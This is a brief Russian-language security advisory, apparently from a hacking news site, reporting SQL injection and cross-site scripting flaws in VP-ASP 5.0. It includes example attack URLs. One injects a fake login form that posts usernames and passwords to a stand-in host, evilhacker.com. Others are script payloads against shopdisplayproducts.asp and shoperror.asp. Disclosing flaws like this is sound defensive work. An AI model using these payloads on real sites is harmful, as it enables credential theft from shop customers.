Программа: VP-ASP 5.0 

Обнаружены SQL-инъекция и межсайтовое выполнение сценариев в VP-ASP. Удаленный атакующий может получить доступ к важной информации на сервере.

1. Удаленный атакующий может выполнить SQL сценарий с помощью специально сформированного POST запроса.
2. Удаленный атакующий может получить доступ к важным данным пользователей. 

1. Пример реализации атаки "phishing":

http://[VICTIM]/vpasp/shopdisplayproduct s.asp?id=5&cat=<form%20action="http:
//www.evilhacker.com/save2db.asp"%20method ="post">Username:<input%20name="us
ername"%20type="text"%20maxlength="30"> <br>Password:<i
nput%20name="password" %20type="text"%20maxlength="30"><br>
<input%20name="login"%20type="submit"%20 value="Login"></form> 

2. Пример реализации XSS:

http://[VICTIM]/vpasp/shopdisplayproducts.asp?id=5& cat=<img%20src="https://xakep.ru/wp-content/uploads/post/22729/javasc ript:alert('XSS')">
http://[VICTIM]/vpasp/shoperror.asp?msg=<img%20 src="javascript:alert('XSS')">

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии